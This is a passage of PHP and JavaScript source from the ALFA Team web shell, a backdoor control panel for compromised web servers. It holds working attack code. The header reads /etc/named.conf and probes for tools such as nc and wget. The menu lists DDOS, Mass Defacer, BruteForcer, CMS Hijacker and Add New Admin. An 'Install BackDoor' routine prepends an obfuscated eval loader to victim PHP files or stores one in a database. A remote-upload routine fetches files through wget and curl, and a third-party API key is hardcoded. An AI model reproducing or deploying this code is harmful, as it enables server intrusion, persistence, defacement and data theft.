	setCookie("alfa_history_files", JSON.stringify(editor_files), 2012);
}
function setEditorTitle(fid, mode){
	if(mode == "out" && editor_current_file != ""){
		fid = editor_current_file;
	}
	if(editor_files[fid]){
		d.getElementsByClassName("editor-path")[0].innerHTML = (editor_files[fid].pwd + "/" + editor_files[fid].file).replace(/\/\//g, "/");
	}
}
function removeHistory(el){
	delete editor_files[el];
	if($(el)){
		$(el).parentNode.parentNode.removeChild($(el).parentNode);
	}
	var elm = d.getElementsByClassName("filestools")[0];
	if(elm){
		if(elm.getAttribute("fid") == el){
			elm.outerHTML = "";
		}
	}
	if(editor_current_file == el){
		editor_current_file = "";
	}
	updateCookieEditor();
}
function getRandom(e){
	for(var i = "undefined" == typeof e ? 20 : e, t = "", s = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", n = i; n > 0; --n) t += s[Math.floor(Math.random() * s.length)];
	return t
}
function reopen(el){
	var file_id = el.getAttribute("id")
	var pwd = editor_files[file_id].pwd;
	var filename = editor_files[file_id].file;
	editor(filename, "auto", "", pwd, file_id);
}
function copyToClipboard(el){
	var node = document.getElementById(el);
	if(document.selection){
		var range = document.body.createTextRange();
		range.moveToElementText(document.getElementById(el));
		range.select();
		document.execCommand("Copy");
		alert("text copied");
	}else if (window.getSelection()){
		var range = document.createRange();
		range.selectNode(document.getElementById(el));
		window.getSelection().removeAllRanges();
		window.getSelection().addRange(range);
		document.execCommand("copy");
		alert("text copied");
	}
}
function encrypt(str, pwd) {
	if (pwd == null || pwd.length <= 0) {
		return null;
	}
	str = alfab64(str, true);
	pwd = alfab64(pwd, true);
	var enc_chr = "";
	var enc_str = "";
	var i = 0;
	while (i < str.length) {
		for (var j = 0; j < pwd.length; j++) {
			enc_chr = str.charCodeAt(i) ^ pwd.charCodeAt(j);
			enc_str += String.fromCharCode(enc_chr);
			i++;
			if (i >= str.length) break;
		}
	}
	return alfab64(enc_str, true);
}
function reloadSetting(e){
alfaloader("block");
_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(e.protect.value)+"&alfa2="+alfab64(e.lgpage.value)+"&alfa3="+alfab64(e.username.value)+"&alfa4="+alfab64(e.password.value)+"&alfa5="+alfab64(">>")+"&alfa6="+alfab64(e.icon.value)+"&alfa7="+alfab64(e.post_encrypt.value)+"&alfa8="+alfab64("main")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},true);
if(e.e.value==0&&e.protect.value==1)setTimeout("location.reload()",1000);
if(e.s.value!=e.icon.value)setTimeout("location.reload()",1000);
return false
}
function reloadColors(config){
	var obj = {};
	if(typeof config == "undefined"){
		d.querySelectorAll(".colors_input").forEach(function(e){
			var id = e.getAttribute("target").replace(".", "");
			obj[id] = e.value;
		});
	}else{
		obj = config;
	}
	alfaloader("block");
	var checdk = ($("use_default_color").checked?"1":"0");
	_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(JSON.stringify(obj))+"&alfa2="+alfab64(">>")+"&alfa3="+alfab64(checdk)+"&alfa8="+alfab64("color")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e){alfaloader("none");evalJS(e);},true);
}
function alfab64(a, normal){
	if(typeof normal != "undefined" || post_encryption_mode == false){
		return window.btoa(unescape(encodeURIComponent(a)));
	}
	return encrypt(a, "'._AlfaSecretKey().'");
}
function evalCss(jcss){
	var style = document.createElement("style");
	if (style.styleSheet) {
		style.styleSheet.cssText = jcss;
	} else {
		style.appendChild(document.createTextNode(jcss));
	}
	d.getElementsByTagName("head")[0].appendChild(style);
}
function colorHandlerKey(el){
	setTimeout(function(e){
		colorHandler(el);
	}, 200);
}
function colorHandler(el){
	var target = el.getAttribute("target");
	var multi = el.getAttribute("multi");
	var ishover = target.indexOf(":hover");
	if(multi){
		var array = JSON.parse(atob(multi));
		var jcss = "";
		for(i in array.multi_selector){
			jcss += i + "{"+array.multi_selector[i].replace(/{color}/g, el.value)+"}";
		}
		evalCss(jcss);
	}
	if(ishover != -1 && !multi){
		$("input_" + target.replace(".","")).value = el.value;
		$("gui_" + target.replace(".","")).value = el.value;
		var css = target+"{color: "+el.value+";}";
		evalCss(css);
	}else{
		$("input_" + target.replace(".","")).value = el.value;
		$("gui_" + target.replace(".","")).value = el.value;
		if(target == ".header_values"){
			target = ".header,.header_values";
		}
		d.querySelectorAll(target).forEach(function(e){
			e.style.color = el.value;
		});
	}
}
function importConfig(event){
	var input = event.target;
    var reader = new FileReader();
    reader.onload = function(){
      var data = reader.result;
	  try{
		  var conf = JSON.parse(data);
		  reloadColors(conf);
	  }catch(e){
		  alert("Config is invalid...!");
	  }
	  $("importFileBtn").value = "";
    };
    reader.readAsText(input.files[0]);
}
function checkBox(){for(i=0;i<d.files.elements.length;i++){if(d.files.elements[i].type == "checkbox"){d.files.elements[i].checked = d.files.elements[0].checked;}}}
function path_history(pos){
	_Ajax(d.URL,"a="+alfab64("GetPathHistory")+"&ajax="+alfab64("true"),function(e){g("FilesMan", e);},true);
}
function runcgi(lang){
	if(cgi_is_minimized && cgi_lang == lang){
		showEditor("cgiloader");
		return false;
	}
	_Ajax(d.URL,"a="+alfab64("cgishell")+"&alfa1="+alfab64(lang)+"&ajax="+alfab64("true"),function(e){
		d.body.style.overflow = "hidden";
		$("cgiloader").style.display = "block";
		$("cgiframe").innerHTML = e;
		cgi_lang = lang;
		if(cgi_is_minimized){
			$("cgiloader-minimized").setAttribute("class", "minimized-hide");
			setTimeout(function(){
				$("cgiloader").removeAttribute("class");
				if(is_minimized){
					$("editor-minimized").style.top = "30%";
				}
			}, 1000);
		}
	});
}
';
echo "</script>
<form style='display:none;' id='dlForm' action='' target='_blank' method='post'>
<input type='hidden' name='a' value='dlfile'>
<input type='hidden' name='c' value=''>
<input type='hidden' name='file' value=''>
</form>
<input type='file' style='display:none;' id='importFileBtn' onchange='importConfig(event);'>
<img id='a_loader' src='".__showicon('loader')."'>";
$cmd_uname = alfaEx("uname -a",false,false);
$uname = function_exists('php_uname') ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname)>0?$cmd_uname:'( php_uname ) Function Disabled !');
if($uname=="( php_uname ) Function Disabled !"){$GLOBALS["need_to_update_header"]="true";}
echo '
</head>
<body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<div id="up_bar"></div>
<div class="whole">
<form method="post" name="mf" style="display:none;">
<input type="hidden" name="a">
<input type="hidden" name="c" value="'.$GLOBALS['cwd'].'">';
for($s=1;$s<=10;$s++){
echo '<input type="hidden" name="alfa'.$s.'">';
}
echo '<input type="hidden" name="charset">
</form>
<div id=\'hidden_sh\'><a class="alert_green" target="_blank" href="?solevisible">Hidden Shell<br><small>Version: <span class="hidden_shell_version">'.__ALFA_VERSION__.'</span></small></a></div>
<div class="header"><table width="100%" border="0">
<tr>
<td width="3%"><span class="header_vars">Uname:</span></td>
<td colspan="2"><span class="header_values" id="header_uname">'.$uname.'</span></td>
</tr>
<tr>
<td><span class="header_vars">User:</span></td>
<td><span class="header_values" id="header_userid">'. $uid . ' [ ' . $user . ' ] </span><span class="header_vars"> Group: </span><span class="header_values" id="header_groupid">' . $gid . ' [ ' . $group . ' ]</span> </td>
<td width="12%" rowspan="8"><img style="border-radius:100px;" width="300" height="170" alt="" src="http://solevisible.com/images/alfa-iran.png" /></td>
</tr>
<tr>
<td><span class="header_vars">PHP:</span></td>
<td><b>'.@phpversion(). ' </b><span class="header_vars"> Safe Mode: '.$safe_modes.'</span></td>
</tr>
<tr>
<td><span class="header_vars">ServerIP:</span></td>
<td><b>'.(!@$_SERVER["SERVER_ADDR"]?(function_exists("gethostbyname")?@gethostbyname($_SERVER['SERVER_NAME']):'????'):@$_SERVER["SERVER_ADDR"]).' <span class="header_vars">Your IP:</span><b> '.@$_SERVER["REMOTE_ADDR"].'</b></td>
</tr>
<tr>
<td width="3%"><span class="header_vars">DateTime:</span></td>
<td colspan="2"><b>'.date('Y-m-d H:i:s').'</b></td>
</tr>
<tr>
<td><span class="header_vars">Domains:</span></td>
<td width="76%"><span class="header_values" id="header_domains">';
if($GLOBALS['sys']=='unix'){
$d0mains = _alfa_file("/etc/named.conf",false);
if(!$d0mains){echo "Cant Read [ /etc/named.conf ]";$GLOBALS["need_to_update_header"]="true";}else{
$count=0;
foreach($d0mains as $d0main){
if(@strstr($d0main,"zone")){
preg_match_all('#zone "(.*)"#', $d0main, $domains);
flush();
if(strlen(trim($domains[1][0])) > 2){
flush();
$count++;}}}
echo "$count Domains";}}
else{echo("Cant Read [ /etc/named.conf ]");}
echo '</span></td>
</tr>
<tr>
<td height="16"><span class="header_vars">HDD:</span></td>
<td><span class="header_vars">Total:</span><b>'.alfaSize($totalSpace).' </b><span class="header_vars">Free:</span><b>' . alfaSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]</b></td>
</tr>';
if($GLOBALS['sys']=='unix'){
$useful_downloader = '<tr><td height="18" colspan="2"><span class="header_vars">useful:</span><span class="header_values" id="header_useful">--------------</span></td></tr><td height="0" colspan="2"><span class="header_vars">Downloader: </span><span class="header_values" id="header_downloader">--------------</span></td></tr>';
if(!@ini_get('safe_mode')){
if(strlen(alfaEx("id",false,false))>0){
echo '<tr><td height="18" colspan="2"><span class="header_vars">Useful : </span>';
$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzialfa2','nc','locate','suidperl');
$x=0;
foreach($userful as $item)if(alfaWhich($item)){$x++;echo '<span class="header_values" style="margin-left: 4px;">'.$item.'</span>';}
if($x==0){echo "<span class='header_values' id='header_useful'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}
echo '</td>
</tr>
<tr>
<td height="0" colspan="2"><span class="header_vars">Downloader: </span>';
$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
$x=0;
foreach($downloaders as $item2)if(alfaWhich($item2)){$x++;echo '<span class="header_values" style="margin-left: 4px;">'.$item2.'</span>';}
if($x==0){echo "<span class='header_values' id='header_downloader'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}
echo '</td>
</tr>';
}else{
echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";
}
}else{
echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";
}
}else{
echo '<tr><td height="18" colspan="2"><span class="header_vars">Windows:</span><b>';
echo alfaEx('ver',false,false);
echo '</td>
</tr> <tr>
<td height="0" colspan="2"><span class="header_vars">Downloader: </span><b>-------------</b></td>
</tr></b>';
}
$quotes = (function_exists('get_magic_quotes_gpc')?get_magic_quotes_gpc():'0');if ($quotes == "1" or $quotes == "on"){$magic = '<b><span class="header_on">ON</span>';}else{$magic = '<span class="header_off">OFF</span>';}
echo '<tr>
<td height="16" colspan="2"><span class="header_vars">Disable Functions: </span><b>'.Alfa_GetDisable_Function().'</b></td>
</tr>
<tr>
<td height="16" colspan="2"><span class="header_vars">CURL :</span>'.$curl.' | <span class="header_vars">SSH2 : </span>'.$ssh2.' | <span class="header_vars">Magic Quotes : </span>'.$magic.' | <span class="header_vars"> MySQL :</span>'.$mysql.' | <span class="header_vars">MSSQL :</span>'.$mssql.' | <span class="header_vars"> PostgreSQL :</span>'.$pg.' | <span class="header_vars"> Oracle :</span>'.$or.' '.($GLOBALS['sys']=="unix"?'| <span class="header_vars"> CGI :</span> '.$cgi_shell:"").'</td><td width="15%"><center><a href="http://zone-h.org/archive/notifier=ALFA%20TEaM%202012" target="_blank"><span><font class="solevisible-text" color="#0F0">Sole Sad & Invisible</font></span></a></center></td>
</tr>
<tr>
<td height="11" colspan="3"><span class="header_vars">Open_basedir :</span><b>'.$open_b.'</b> | <span class="header_vars">Safe_mode_exec_dir :</span><b>'.$safe_exe.'</b> | <span class="header_vars"> Safe_mode_include_dir :</span></b>'.$safe_include.'</b></td>
</tr>
<tr>
<td height="11"><span class="header_vars">SoftWare: </span></td>
<td colspan="2"><b>'.@getenv('SERVER_SOFTWARE').'</b></td>
</tr>';
if($GLOBALS['sys']=="win"){
echo '<tr>
<td height="12"><span class="header_vars">DRIVE:</span></td>
<td colspan="2"><b>'.$drives.'</b></td>
</tr>';
}
echo '<tr>
<td height="12"><span class="header_vars">PWD:</span></td>
<td colspan="2"><span id="header_cwd">'.$cwd_links.' </span><a href="javascript:void(0);" onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')"><span class="home_shell">[ Home Shell ]</span> </a><a href="javascript:void(0);" onclick="path_history(\'back\');"><span class="back_shell">[ BACK ]</span></a></td>
</tr>
</table>
</div>
<div id="meunlist">
<ul>
';
$li = array('FilesMan'=>'Home','proc'=>'Process','phpeval'=>'Eval','sql'=>'SQL Manager','dumper'=>'Mysql Dumper','hash'=>'En-Decoder','connect'=>'BC','ssh2'=>'SSH2',
'zoneh'=>'ZONE-H','dos'=>'DDOS','safe'=>'ByPasser','cgishell'=>'Cgi Shell','ssiShell'=>'SSI SHELL','cpcrack'=>'Hash Tools',
'portscanner'=>'Port Scaner','basedir'=>'Open BaseDir','mail'=>'Fake Mail','ziper'=>'Compressor','IndexChanger'=>'Index Changer','pwchanger'=>'Add New Admin','ShellInjectors'=>'Shell Injectors',
'php2xml'=>'PHP2XML','cloudflare'=>'CloudFlare','Whmcs'=>'Whmcs DeCoder','symlink'=>'Symlink','MassDefacer'=>'Mass Defacer','Crackers'=>'BruteForcer','searcher'=>'Searcher',
'cmshijacker'=>'CMS Hijacker','remotedl'=>'Remote Upload','inbackdoor'=>'Install BackDoor','whois'=>'Whois','settings'=>'Alfa Settings','plus'=>'<span class="alfa_plus">Alfa +</font>','selfrm'=>'Remove Shell'
);
foreach($li as $key=>$value){
echo('<li><a href="javascript:void(0);" class="menu_options" onclick="g(\''.$key.'\',null,\'\',\'\',\'\');">'.$value.'</a></li>'."\n");
}
if(!empty($_SESSION['AlfaUser']) && !empty($_SESSION['AlfaPass']))
echo '<li><a href="javascript:void(0);" onclick="g(\'logout\',null,\'\',\'\',\'\');setTimeout(function(){location.reload();},2000);"><font color="red">LogOut</font></a></li></ul></div>';
else
echo '</ul></div>';}else{
@error_reporting(E_ALL ^ E_NOTICE);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('magic_quotes_runtime', 0);
@set_time_limit(0);
}}
function alfalogout(){
unset($_SESSION['AlfaUser'],$_SESSION['AlfaPass']);
echo("<center><font color='red'>Logout...</font></center>");
}
function showAnimation($name){
	return '-webkit-animation: '.$name.' 800ms ease-in-out forwards;-moz-animation: '.$name.' 800ms ease-in-out forwards;-ms-animation: '.$name.' 800ms ease-in-out forwards;animation: '.$name.' 800ms ease-in-out forwards;';
}
function __showicon($r){
	$s['btn']='http://solevisible.com/images/btn.png';
	$s['alfamini']='http://solevisible.com/images/alfamini.png';
	$s['loader']='http://solevisible.com/images/loader.png';
	//return 'data:image/png;base64,'.__get_resource($s[$r]);
	return $s[$r];
}
function alfainbackdoor(){
alfahead();
echo '<div class=header><center><p><div class="txtfont_header">| Install BackDoor |</div></p><h3><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'file\')">| In File | </a><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'db\')">| In DataBase | </a></h3></center>';
$error = '<font color="red">Error In Inject BackDoor...!<br>File Loader is not Writable Or Not Exists...!</font>';
$success= '<font color="green">Success...!';
$textarea = "<div style='display:none;' id='backdoor_textarea'><div class='txtfont'>Your Shell:</div><p><textarea name='shell' rows='19' cols='103'><?php\n\techo('Alfa Team is Here...!');\n?></textarea></p></div>";
$select = "<div class='txtfont'>Use:</div> <select name='method' style='width:155px;' onChange='inBackdoor(this);'><option value='alfa'>Alfa Team Uploader</option><option value='my'>My Private Shell</option></select>";
$cwd = 'Example: /home/alfa/public_html/index.php';
if($_POST['alfa1']=='file'){
echo("<center><p><div class='txtfont_header'>| In File |</div></p><p><form onsubmit=\"g('inbackdoor',null,'file',this.method.value,this.file.value,this.shell.value,this.key.value);return false;\">{$select} <div class='txtfont'>Backdoor Loader:</div> <input type='text' name='file' size='50' placeholder='{$cwd}'> <div class='txtfont'>Key: </div> <input type='text' name='key' size='10' value='alfa'> <input type='submit' value=' '>{$textarea}</form></p></center>");
if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa4']!=''){
$method = $_POST['alfa2'];
$file = $_POST['alfa3'];
$shell = $_POST['alfa4'];
$key = str_replace(array('"','\''),'',trim($_POST['alfa5']));
if($key=='')$key='alfa';
if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}
$code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));");$x("'.$shell.'");exit;}?>';
if(@is_file($file)&&@is_writable($file)){@file_put_contents($file,$code."\n".@file_get_contents($file));__alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');}else{__alert($error);}}}
if($_POST['alfa1']=='db'){
echo("<center><p><div class='txtfont_header'>| In DataBase |</div></p>".getConfigHtml('all')."<p><form onsubmit=\"g('inbackdoor',null,'db',this.db_host.value,this.db_username.value,this.db_password.value,this.db_name.value,this.file.value,this.method.value,this.shell.value,this.key.value);return false;\">");
$table = array('td1' =>
array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
'td2' =>
array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
'td3' =>
array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
'td4' =>
array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
'td5' =>
array('color' => 'FFFFFF', 'tdName' => 'Backdoor Loader: ', 'inputName' => 'file', 'inputValue' => $cwd, 'inputSize' => '50', 'placeholder' => true),
'td6' =>
array('color' => 'FFFFFF', 'tdName' => 'Key: ', 'inputName' => 'key', 'inputValue' => 'alfa', 'inputSize' => '50')
);
create_table($table);
echo("<p>{$select}</p>");
echo($textarea);
echo("<p><input type='submit' value=' '></p></form></p></center>");
if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa5']!=''&&$_POST['alfa6']!=''){
$dbhost = $_POST['alfa2'];
$dbuser = $_POST['alfa3'];
$dbpw = $_POST['alfa4'];
$dbname = $_POST['alfa5'];
$file = $_POST['alfa6'];
$method = $_POST['alfa7'];
$shell = $_POST['alfa8'];
$key = str_replace(array('"','\''),'',trim($_POST['alfa9']));
if($key=='')$key='alfa';
if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}
if($conn = mysqli_connect($dbhost,$dbuser,$dbpw,$dbname)){
$code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$conn=mysqli_connect("'.str_replace('"','\"',$dbhost).'","'.str_replace('"','\"',$dbuser).'","'.str_replace('"','\"',$dbpw).'","'.str_replace('"','\"',$dbname).'");$q=mysqli_query($conn,"SELECT `code` FROM alfa_bc LIMIT 0,1");$r=mysqli_fetch_assoc($q);$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));");$x($r["code"]);exit;}?>';
if(@is_file($file)&&@is_writable($file)){
@mysqli_query($conn,'DROP TABLE `alfa_bc`');
@mysqli_query($conn,'CREATE TABLE `alfa_bc` (code LONGTEXT)');
@mysqli_query($conn,'INSERT INTO `alfa_bc` VALUES("'.$shell.'")');
@file_put_contents($file,$code."\n".@file_get_contents($file));
__alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');}else{__alert($error);}}}}
echo('</div>');
alfafooter();
}
function alfawhois(){
echo("<div class='header'><center><p><div class='txtfont_header'>| Whois |</div></p><p><form onsubmit=\"g('whois',null,this.url.value,'>>');return false;\"><div class='txtfont'>Url: </div> <input type='text' name='url' style='text-align:center;' size='50' placeholder='google.com'> <input type='submit' value=' '></form></p></center>");
if($_POST['alfa2']=='>>'&&!empty($_POST['alfa1'])){
$site = str_replace(array('http://','https://','www.','ftp://'),'',$_POST['alfa1']);
$target = 'http://api.whoapi.com/?apikey=093b6cb9e6ea724e101928647df3e009&r=whois&domain='.$site;
$data = @file_get_contents($target);
if($data==''){$get = new AlfaCURL();$get->ssl = true;$data = $get->Send($target);}
$target = @json_decode($data,true);
echo __pre();
if(is_array($target)){echo($target["whois_raw"]);}else{echo alfaEx("whois ".$site);}}
echo("</div>");
}
function alfaremotedl(){
alfahead();
echo("<div class='header'><center><p><div class='txtfont_header'>| Upload From Url |</div></p><p>
<form onsubmit=\"g('remotedl',null,this.d.value,this.p.value,'>>');return false;\">
<p><div class='txtfont'>Url: </div>&nbsp;&nbsp;&nbsp;<input type='text' name='d' size='50'></p>
<div class='txtfont'>Path:</div> <input type='text' name='p' size='50' value='".$GLOBALS['cwd']."'><p><input type='submit' value=' '></p>
</form></p></center>");
if(isset($_POST['alfa1'],$_POST['alfa2'],$_POST['alfa3'])&&!empty($_POST['alfa1'])&&$_POST['alfa3']=='>>'){
echo __pre();
$url = $_POST['alfa1'];
$path = $_POST['alfa2'];
echo('<center>');
if(__download($url,$path)){
echo('<font color="green">Success...!</font>');
}else{
echo('<font color="red">Error...!</font>');
}
echo('</center>');
}
echo("</div>");
alfafooter();
}
function __download($url,$path=false){
if(!preg_match("/[a-z]+:\/\/.+/",$url)) return false;
$saveas = basename(rawurldecode($url));
if($path){$saveas=$path.$saveas;}
if($content = __read_file($url)){
if(@is_file($saveas))@unlink($saveas);
if(__write_file($saveas, $content)){return true;}}
$buff = alfaEx("wget ".$url." -O ".$saveas);
if(@is_file($saveas)) return true;
$buff = alfaEx("curl ".$url." -o ".$saveas);
if(@is_file($saveas)) return true;
$buff = alfaEx("lwp-download ".$url." ".$saveas);
if(@is_file($saveas)) return true;
$buff = alfaEx("lynx -source ".$url." > ".$saveas);
if(@is_file($saveas)) return true;
$buff = alfaEx("GET ".$url." > ".$saveas);
if(@is_file($saveas)) return true;
$buff = alfaEx("links -source ".$url." > ".$saveas);
if(@is_file($saveas)) return true;
$buff = alfaEx("fetch -o ".$saveas." -p ".$url);
if(@is_file($saveas)) return true;
return false;
}
function clean_string($string){
  if(function_exists("iconv")){
	  $s = trim($string);
	  $s = iconv("UTF-8", "UTF-8//IGNORE", $s);
  }
  return $s;
}
function __read_file($file, $boom = true){
$content = false;
if($fh = @fopen($file, "rb")){
$content = "";
while(!feof($fh)){
$content .= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192);
}
}
if(empty($content)||!$content){
	$content = alfaEx("cat '".addslashes($file)."'");
}
return $content;
}
function alfaSettings(){
alfahead();
AlfaNum(6,7,8,9,10);
echo '<div class=header><center><p><div class="txtfont_header">| Settings |</div></p><h3><a href=javascript:void(0) onclick="g(\'settings\',null,null,null,null,null,null,null,null,\'main\')">| Generall Setting | </a><a href=javascript:void(0) onclick="g(\'settings\',null,null,null,null,null,null,null,null,\'color\')">| Change Color | </a></h3></center>';
if($_POST["alfa8"] == "main"){
echo '<p><center><div class="txtfont_header">| Settings |</div></p><form onSubmit="reloadSetting(this);return false;" method=\'post\'>';
$lg_array = array('0'=>'No','1'=>'Yes');
$penc_array = array('false'=>'No','true'=>'Yes');
$protect_html = "";
$icon_html = "";
$postEnc_html = "";
$login_html = "";
foreach($lg_array as $key=>$val)$protect_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['safemode']=='1'?'selected':'').'>'.$val.'</option>';
foreach($lg_array as $key=>$val)$icon_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['show_icons']=='1'?'selected':'').'>'.$val.'</option>';
foreach($penc_array as $key=>$val)$postEnc_html .= '<option value="'.$key.'" '.(!empty($_POST['alfa7'])&&$_POST['alfa7']==$key?"selected":(__ALFA_POST_ENCRYPTION__&&empty($_POST['alfa7'])?'selected':'')).'>'.$val.'</option>';
$lg_array = array("gui"=>"GUI","500"=>"500 Internal Server Error","403"=>"403 Forbidden","404"=>"404 NotFound");
foreach($lg_array as $key=>$val)$login_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['login_page']==$key?'selected':'').'>'.$val.'</option>';
echo '';
echo '<table border="1"><tbody><tr><td><div class="tbltxt" style="color:#FFFFFF">Protect:</div></td><td><select name="protect" style="width:100%;">'.$protect_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Post Encryption:</div></td><td><select name="post_encrypt" style="width:100%;">'.$postEnc_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Show Icons:</div></td><td><select name="icon" style="width:100%;">'.$icon_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">login Page:</div></td><td><select style="width:100%;" name="lgpage">'.$login_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">UserName:</div></td><td><input type="text" style="width:95%;" name="username" value="'.(empty($_POST['alfa3'])?$GLOBALS['DB_NAME']['user']:$_POST['alfa3']).'" placeholder="solevisible"></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Password:</div></td><td><input type="text" style="width:95%;" name="password" placeholder="*****"></td></tr></tbody></table><input type="hidden" name="e" value="'.$GLOBALS['DB_NAME']['safemode'].'"><input type="hidden" name="s" value="'.$GLOBALS['DB_NAME']['show_icons'].'"><p><input type="submit" name="btn" value=" "></p></form></center>';
if($_POST['alfa5']=='>>'){
echo __pre();
if(!empty($_POST['alfa3'])){
$protect = $_POST['alfa1'];
$lgpage = $_POST['alfa2'];
$username = $_POST['alfa3'];
$password = md5($_POST['alfa4']);
$icon = $_POST['alfa6'];
$post_encrypt = $_POST['alfa7'];
@chdir($GLOBALS['home_cwd']);
$basename = @basename($_SERVER['PHP_SELF']);
$data = @file_get_contents($basename);
$find_user = '/\'user\'(.*?),/i';
$find_pw = '/\'pass\'(.*?),/i';
$find_lg = '/\'login_page\'(.*?),/i';
$find_p = '/\'safemode\'(.*?),/i';
$icons = '/\'show_icons\'(.*?),/i';
$postEnc = '/\'post_encryption\'(.*?),/i';
if(!empty($username)&&preg_match($find_user,$data,$e)){
$new = '\'user\' => \''.$username.'\',';
$data = str_replace($e[0],$new,$data);
}
if(!empty($_POST['alfa4'])&&preg_match($find_pw,$data,$e)){
$new = '\'pass\' => \''.$password.'\',';
$data = str_replace($e[0],$new,$data);
}
if(!empty($lgpage)&&preg_match($find_lg,$data,$e)){
$new = '\'login_page\' => \''.$lgpage.'\',';
$data = str_replace($e[0],$new,$data);
}
if(!empty($find_p)&&preg_match($find_p,$data,$e)){
$new = '\'safemode\' => \''.$protect.'\',';
$data = str_replace($e[0],$new,$data);
}
if(preg_match($icons,$data,$e)){
$new = '\'show_icons\' => \''.$icon.'\',';
$data = str_replace($e[0],$new,$data);
}
if(preg_match($postEnc,$data,$e)){
$new = '\'post_encryption\' => '.$post_encrypt.',';
$data = str_replace($e[0],$new,$data);
}
if(@file_put_contents($basename,$data)){
echo '<b>UserName: </b><font color="green"><b>'.$username.'</b></font><br /><b>Password: </b><font color="green"><b>'.$_POST['alfa4'].'</b></font><script>post_encryption_mode = '.$post_encrypt.';</script>';
}else{
__alert("<span style='color:red;'>File has no edit access...!</span>");
}
}else{
__alert("<span style='color:red;'>UserName is Empty !</span>");
}
}
}elseif($_POST["alfa8"] == "color"){
echo('<center><p><div class="txtfont_header">| Custom Color |</div></p><form onSubmit="reloadColors();return false;" method=\'post\'>');
echo '<table border="1"><tbody>';
$template = '<tr><td style="text-align:center;"><a href="http://solevisible.com/customcolors/{help}.png" target="_blank"><font color="#00FF00">Help</font></a></td><td style="text-align:center;"><div class="tbltxt">{index}</div></td><td><div class="tbltxt" style="margin-left:5px;">{target}:</div></td><td><input style="width:60px;" multi="{multi}" id="gui_{target}" onChange="colorHandler(this);" target=".{target}" type="color" value="{color}"></td><td><input type="text" style="text-align:center;" multi="{multi}" onkeyup="colorHandlerKey(this);" target=".{target}" id="input_{target}" class="colors_input" placeholder="#ffffff" value="{color}"></td></tr>';
$x = 1;
foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){
	$multi = "";
	if(is_array($value)){
		if(isset($value["multi_selector"])){
			$multi = __ZW5jb2Rlcg(json_encode($value));
		}
	}
	$value = alfa_getColor($key);
	$help = strtolower(str_replace(array(":", "+"), array("_", "_plus"), $key));
	echo str_replace(array("{index}", "{target}", "{color}", "{multi}", "{help}"), array($x++, $key, $value, $multi, $help), $template);
}
echo '<tr><td style="text-align:center;">-</td><td style="text-align:center;"><div class="tbltxt">*</div></td><td><div style="margin-left:5px;" class="tbltxt">Use Default Color:</div></td><td></td><td><center><input type="checkbox" id="use_default_color" value="1"></center></td></tr>';

echo '</tbody></table><p><input type="submit" name="btn" value=" "></p></form><p><button style="padding:4px;;margin-right:20px;" onclick="$(\'importFileBtn\').click();" class="button"> Import </button> <button style="padding:4px;margin-left:20px;" onclick="g(\'settings\',null,null,null,null,null,null,null,\'export\',\'color\')" class="button"> Export </button></center></p>';
if($_POST['alfa7']=='export'){
	echo __pre();
	$colors = is_array($GLOBALS["DB_NAME"]["color"])?$GLOBALS["DB_NAME"]["color"]:array();
	$glob_colors = $GLOBALS["__ALFA_COLOR__"];
	$array = array();
	foreach($glob_colors as $k => $v){
